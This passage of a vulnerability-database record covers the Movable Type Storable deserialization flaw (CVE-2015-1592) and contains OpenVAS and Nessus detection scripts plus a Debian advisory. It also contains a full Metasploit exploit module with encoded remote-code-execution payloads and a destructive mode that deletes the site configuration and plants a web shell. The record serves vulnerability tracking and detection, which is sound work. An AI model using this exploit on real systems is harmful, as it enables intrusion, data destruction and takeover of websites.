be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:sixapart:movable_type\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.805357\");\n script_version(\"$Revision: 12861 $\");\n script_cve_id(\"CVE-2015-1592\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-12-21 10:53:04 +0100 (Fri, 21 Dec 2018) $\");\n script_tag(name:\"creation_date\", value:\"2015-04-10 15:04:37 +0530 (Fri, 10 Apr 2015)\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_name(\"Movable Type Local File Inclusion Vulnerability\");\n\n script_tag(name:\"summary\", value:\"The host is installed with movable type\n and is prone to arbitrary file upload vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Send a crafted data via HTTP POST request\n and check whether it is is able to upload file or not.\");\n\n script_tag(name:\"insight\", value:\"Flaw is due to he Perl Storable::thaw\n function which allows remote attackers to include and execute arbitrary\n local Perl files and possibly execute arbitrary code.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n unauthenticated remote attacker to upload files and execute arbitrary code\n in an affected site.\");\n\n script_tag(name:\"affected\", value:\"Movable Type before 5.2.12.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Movable Type 5.2.12.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"https://exchange.xforce.ibmcloud.com/#/vulnerabilities/100912\");\n 
script_xref(name:\"URL\", value:\"https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"mt_detect.nasl\");\n script_mandatory_keys(\"movabletype/detected\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!http_port = get_app_port(cpe:CPE))\n exit(0);\n\nif(!movVer = get_app_version(cpe:CPE, port:http_port))\n exit(0);\n\nif(version_is_less(version:movVer, test_version:\"5.2.12\")) {\n report = report_fixed_ver(installed_version: movVer, fixed_version: \"5.2.12\");\n security_message(data:report, port:http_port);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2017-07-24T12:52:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. 
The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184 \nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057 \nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592 \nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.", "modified": "2017-07-07T00:00:00", "published": "2015-03-12T00:00:00", "id": "OPENVAS:703183", "href": "http://plugins.openvas.org/nasl.php?oid=703183", "type": "openvas", "title": "Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3183.nasl 6609 2017-07-07 12:05:59Z cfischer $\n# Auto-generated from advisory DSA 3183-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\n\nif(description)\n{\n script_id(703183);\n script_version(\"$Revision: 6609 $\");\n script_cve_id(\"CVE-2013-2184\", \"CVE-2014-9057\", \"CVE-2015-1592\");\n script_name(\"Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)\");\n script_tag(name: \"last_modification\", value: \"$Date: 2017-07-07 14:05:59 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value: \"2015-03-12 00:00:00 +0100 (Thu, 12 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name: \"solution_type\", value: \"VendorFix\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2015/dsa-3183.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: \"movabletype-opensource on Debian Linux\");\n script_tag(name: \"insight\", value: \"MovableType is a popular blogging,\nor web publishing platform. It provides an easy to use web interface to\npublishing blogs and contains many features and plugins.\");\n script_tag(name: \"solution\", value: \"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.1.4+dfsg-4+deb7u2.\n\nWe recommend that you upgrade your movabletype-opensource packages.\");\n script_tag(name: \"summary\", value: \"Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. 
The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184 \nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057 \nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592 \nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.\");\n script_tag(name: \"vuldetect\", value: \"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"movabletype-opensource\", ver:\"5.1.4+dfsg-4+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"movabletype-plugin-core\", ver:\"5.1.4+dfsg-4+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"movabletype-plugin-zemanta\", ver:\"5.1.4+dfsg-4+deb7u2\", rls_regex:\"DEB7.[0-9]\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:36:55", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. 
The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184\nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057\nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592\nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.", "modified": "2019-03-18T00:00:00", "published": "2015-03-12T00:00:00", "id": "OPENVAS:1361412562310703183", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310703183", "type": "openvas", "title": "Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_3183.nasl 14278 2019-03-18 14:47:26Z cfischer $\n# Auto-generated from advisory DSA 3183-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.703183\");\n script_version(\"$Revision: 14278 $\");\n script_cve_id(\"CVE-2013-2184\", \"CVE-2014-9057\", \"CVE-2015-1592\");\n script_name(\"Debian Security Advisory DSA 3183-1 (movabletype-opensource - security update)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:47:26 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2015-03-12 00:00:00 +0100 (Thu, 12 Mar 2015)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2015/dsa-3183.html\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2015 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB7\");\n script_tag(name:\"affected\", value:\"movabletype-opensource on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (wheezy),\nthese problems have been fixed in version 5.1.4+dfsg-4+deb7u2.\n\nWe recommend that you upgrade your movabletype-opensource packages.\");\n script_tag(name:\"summary\", value:\"Multiple vulnerabilities have been\ndiscovered in Movable Type, a blogging system. 
The Common Vulnerabilities and\nExposures project identifies the following problems:\n\nCVE-2013-2184\nUnsafe use of Storable::thaw in the handling of comments to blog\nposts could allow remote attackers to include and execute arbitrary\nlocal Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057\nNetanel Rubin from Check Point Software Technologies discovered a\nSQL injection vulnerability in the XML-RPC interface allowing\nremote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592\nThe Perl Storable::thaw function is not properly used, allowing\nremote attackers to include and execute arbitrary local Perl files\nand possibly remotely execute arbitrary code.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed\nsoftware version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"movabletype-opensource\", ver:\"5.1.4+dfsg-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"movabletype-plugin-core\", ver:\"5.1.4+dfsg-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"movabletype-plugin-zemanta\", ver:\"5.1.4+dfsg-4+deb7u2\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2020-10-14T22:46:41", "description": "This module exploits a serialization flaw in MovableType before 5.2.12 to execute arbitrary code. The default nondestructive mode depends on the target server having the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths. 
The destructive mode of operation uses only required MovableType dependencies, but it will noticeably corrupt the MovableType installation.\n", "published": "2015-05-03T19:18:01", "type": "metasploit", "title": "SixApart MovableType Storable Perl Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2015-1592"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/UNIX/WEBAPP/SIXAPART_MOVABLETYPE_STORABLE_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SixApart MovableType Storable Perl Code Execution',\n 'Description' => %q{\n This module exploits a serialization flaw in MovableType before 5.2.12 to execute\n arbitrary code. The default nondestructive mode depends on the target server having\n the Object::MultiType and DateTime Perl modules installed in Perl's @INC paths.\n The destructive mode of operation uses only required MovableType dependencies,\n but it will noticeably corrupt the MovableType installation.\n },\n 'Author' =>\n [\n 'John Lightsey',\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-1592' ],\n [ 'URL', 'https://movabletype.org/news/2015/02/movable_type_607_and_5212_released_to_close_security_vulnera.html' ],\n ],\n 'Privileged' => false, # web server context\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'BadChars' => ' ',\n 'Space' => 1024,\n },\n 'Compat' =>\n {\n 'PayloadType' => 'cmd'\n },\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Targets' => [['Automatic', {}]],\n 'DisclosureDate' => '2015-02-11',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [true, 'MoveableType cgi-bin directory path', '/cgi-bin/mt/']),\n OptBool.new('DESTRUCTIVE', [true, 'Use destructive 
attack method (more likely to succeed, but corrupts target system.)', false])\n ], self.class\n )\n\n end\n\n=begin\n\n#!/usr/bin/perl\n\n# generate config parameters for injection checks\n\nuse Storable;\n\n{\n\n package XXXCHECKXXX;\n\n sub STORABLE_thaw {\n return 1;\n }\n\n sub STORABLE_freeze {\n return 1;\n }\n\n}\n\nmy $check_obj = bless { ignore => 'this' }, XXXCHECKXXX;\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze({ x => $check_obj});\n$frozen = unpack 'H*', $frozen;\nprint \"LFI test for storable flaw is: $frozen\\n\";\n\n{\n package DateTime;\n use overload '+' => sub { 'ignored' };\n}\n\n=end\n\n def check\n vprint_status(\"Sending storable test injection for XXXCHECKXXX.pm load failure\")\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'retry',\n 'step' => 'configure',\n 'config' => '53455247000000000000000304080831323334353637380408080803010000000413020b585858434845434b58585801310100000078'\n }\n })\n\n unless res && res.code == 200 && res.body.include?(\"Can't locate XXXCHECKXXX.pm\")\n vprint_error(\"Failed XXXCHECKXXX.pm load test\");\n return Exploit::CheckCode::Safe\n end\n Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n if datastore['DESTRUCTIVE']\n exploit_destructive\n else\n exploit_nondestructive\n end\n end\n\n=begin\n\n#!/usr/bin/perl\n\n# Generate nondestructive config parameter for RCE via Object::MultiType\n# and Try::Tiny. 
The generated value requires minor modification to insert\n# the payload inside the system() call and resize the padding.\n\nuse Storable;\n\n{\n package Object::MultiType;\n use overload '+' => sub { 'ingored' };\n}\n\n{\n package Object::MultiType::Saver;\n}\n\n{\n package DateTime;\n use overload '+' => sub { 'ingored' };\n}\n\n{\n package Try::Tiny::ScopeGuard;\n}\n\nmy $try_tiny_loader = bless {}, 'DateTime';\nmy $multitype_saver = bless { c => 'MT::run_app' }, 'Object::MultiType::Saver';\nmy $multitype_coderef = bless \\$multitype_saver, 'Object::MultiType';\nmy $try_tiny_executor = bless [$multitype_coderef, 'MT;print qq{Content-type: text/plain\\n\\n};system(q{});' . ('#' x 1025) . \"\\nexit;\"], 'Try::Tiny::ScopeGuard';\n\nmy $data = [$try_tiny_loader, $try_tiny_executor];\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);\n$frozen = unpack 'H*', $frozen;\nprint \"RCE payload requiring Object::MultiType and DateTime: $frozen\\n\";\n\n=end\n\n def exploit_nondestructive\n print_status(\"Using nondestructive attack method\")\n config_payload = \"53455247000000000000000304080831323334353637380408080802020000001411084461746554696d6503000000000411155472793a3a54696e793a3a53636f7065477561726402020000001411114f626a6563743a3a4d756c7469547970650411184f626a6563743a3a4d756c7469547970653a3a536176657203010000000a0b4d543a3a72756e5f6170700100000063013d0400004d543b7072696e742071717b436f6e74656e742d747970653a20746578742f706c61696e5c6e5c6e7d3b73797374656d28717b\"\n config_payload << payload.encoded.unpack('H*')[0]\n config_payload << \"7d293b\"\n config_payload << \"23\" * (1025 - payload.encoded.length)\n config_payload << \"0a657869743b\"\n\n print_status(\"Sending payload (#{payload.raw.length} bytes)\")\n\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'retry',\n 'step' => 'configure',\n 'config' => config_payload\n }\n }, 5)\n 
end\n\n=begin\n\n#!/usr/bin/perl\n\n# Generate destructive config parameter to unlink mt-config.cgi\n\nuse Storable;\n\n{\n package CGITempFile;\n}\n\nmy $unlink_target = \"mt-config.cgi\";\nmy $cgitempfile = bless \\$unlink_target, \"CGITempFile\";\n\nmy $data = [$cgitempfile];\nmy $frozen = 'SERG' . pack( 'N', 0 ) . pack( 'N', 3 ) . Storable::freeze($data);\n$frozen = unpack 'H*', $frozen;\nprint \"RCE unlink payload requiring CGI: $frozen\\n\";\n\n=end\n\n def exploit_destructive\n print_status(\"Using destructive attack method\")\n # First we need to delete mt-config.cgi using the storable injection\n\n print_status(\"Sending storable injection to unlink mt-config.cgi\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'retry',\n 'step' => 'configure',\n 'config' => '534552470000000000000003040808313233343536373804080808020100000004110b43474954656d7046696c650a0d6d742d636f6e6669672e636769'\n }\n })\n\n if res && res.code == 200\n print_good(\"Successfully sent unlink request\")\n else\n fail_with(Failure::Unknown, \"Error sending unlink request\")\n end\n\n # Now we rewrite mt-config.cgi to accept a payload\n\n print_status(\"Rewriting mt-config.cgi to accept the payload\")\n\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt-wizard.cgi'),\n 'vars_get' => {\n '__mode' => 'next_step',\n 'step' => 'optional',\n 'default_language' => 'en_us',\n 'email_address_main' => \"x\\nObjectDriver mysql;use CGI;print qq{Content-type: text/plain\\\\n\\\\n};if(my $c = CGI->new()->param('xyzzy')){system($c);};unlink('mt-config.cgi');exit;1\",\n 'set_static_uri_to' => '/',\n 'config' => '5345524700000000000000024800000001000000127365745f7374617469635f66696c655f746f2d000000012f', # equivalent to 'set_static_file_to' => '/',\n }\n })\n\n if res && res.code == 200\n print_good(\"Successfully sent mt-config rewrite request\")\n else\n 
fail_with(Failure::Unknown, \"Error sending mt-config rewrite request\")\n end\n\n # Finally send the payload\n\n print_status(\"Sending payload request\")\n\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, 'mt.cgi'),\n 'vars_get' => {\n 'xyzzy' => payload.encoded,\n }\n }, 5)\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/sixapart_movabletype_storable_exec.rb"}], "debian": [{"lastseen": "2019-05-30T02:22:08", "bulletinFamily": "unix", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3183-1 security@debian.org\nhttp://www.debian.org/security/ Salvatore Bonaccorso\nMarch 12, 2015 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : movabletype-opensource\nCVE ID : CVE-2013-2184 CVE-2014-9057 CVE-2015-1592\nDebian Bug : 712602 774192\n\nMultiple vulnerabilities have been discovered in Movable Type, a\nblogging system. 
The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2013-2184\n\n Unsafe use of Storable::thaw in the handling of comments to blog\n posts could allow remote attackers to include and execute arbitrary\n local Perl files or possibly remotely execute arbitrary code.\n\nCVE-2014-9057\n\n Netanel Rubin from Check Point Software Technologies discovered a\n SQL injection vulnerability in the XML-RPC interface allowing\n remote attackers to execute arbitrary SQL commands.\n\nCVE-2015-1592\n\n The Perl Storable::thaw function is not properly used, allowing\n remote attackers to include and execute arbitrary local Perl files\n and possibly remotely execute arbitrary code.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 5.1.4+dfsg-4+deb7u2.\n\nWe recommend that you upgrade your movabletype-opensource packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "edition": 3, "modified": "2015-03-12T15:22:50", "published": "2015-03-12T15:22:50", "id": "DEBIAN:DSA-3183-1:59B04", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2015/msg00068.html", "title": "[SECURITY] [DSA 3183-1] movabletype-opensource security update", "type": "debian", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T09:48:59", "description": "Multiple vulnerabilities have been discovered in Movable Type, a\nblogging system. 
The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2013-2184\n Unsafe use of Storable::thaw in the handling of comments\n to blog posts could allow remote attackers to include\n and execute arbitrary local Perl files or possibly\n remotely execute arbitrary code.\n\n - CVE-2014-9057\n Netanel Rubin from Check Point Software Technologies\n discovered a SQL injection vulnerability in the XML-RPC\n interface allowing remote attackers to execute arbitrary\n SQL commands.\n\n - CVE-2015-1592\n The Perl Storable::thaw function is not properly used,\n allowing remote attackers to include and execute\n arbitrary local Perl files and possibly remotely execute\n arbitrary code.", "edition": 15, "published": "2015-03-13T00:00:00", "title": "Debian DSA-3183-1 : movabletype-opensource - security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "modified": "2015-03-13T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:movabletype-opensource", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3183.NASL", "href": "https://www.tenable.com/plugins/nessus/81793", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3183. 
The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(81793);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-2184\", \"CVE-2014-9057\", \"CVE-2015-1592\");\n script_xref(name:\"DSA\", value:\"3183\");\n\n script_name(english:\"Debian DSA-3183-1 : movabletype-opensource - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities have been discovered in Movable Type, a\nblogging system. The Common Vulnerabilities and Exposures project\nidentifies the following problems :\n\n - CVE-2013-2184\n Unsafe use of Storable::thaw in the handling of comments\n to blog posts could allow remote attackers to include\n and execute arbitrary local Perl files or possibly\n remotely execute arbitrary code.\n\n - CVE-2014-9057\n Netanel Rubin from Check Point Software Technologies\n discovered a SQL injection vulnerability in the XML-RPC\n interface allowing remote attackers to execute arbitrary\n SQL commands.\n\n - CVE-2015-1592\n The Perl Storable::thaw function is not properly used,\n allowing remote attackers to include and execute\n arbitrary local Perl files and possibly remotely execute\n arbitrary code.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=712602\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=774192\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2013-2184\"\n );\n script_set_attribute(\n 
attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2014-9057\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/CVE-2015-1592\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/movabletype-opensource\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2015/dsa-3183\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the movabletype-opensource packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 5.1.4+dfsg-4+deb7u2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SixApart MovableType Storable Perl Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:movabletype-opensource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/03/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/03/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"movabletype-opensource\", reference:\"5.1.4+dfsg-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"movabletype-plugin-core\", reference:\"5.1.4+dfsg-4+deb7u2\")) flag++;\nif (deb_check(release:\"7.0\", prefix:\"movabletype-plugin-zemanta\", reference:\"5.1.4+dfsg-4+deb7u2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:58", "bulletinFamily": "software", "cvelist": ["CVE-2014-9057", "CVE-2015-1592", "CVE-2013-2184"], "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA512\r\n\r\n- -------------------------------------------------------------------------\r\nDebian Security Advisory DSA-3183-1 security@debian.org\r\nhttp://www.debian.org/security/ Salvatore Bonaccorso\r\nMarch 12, 2015 http://www.debian.org/security/faq\r\n- -------------------------------------------------------------------------\r\n\r\nPackage : movabletype-opensource\r\nCVE ID : 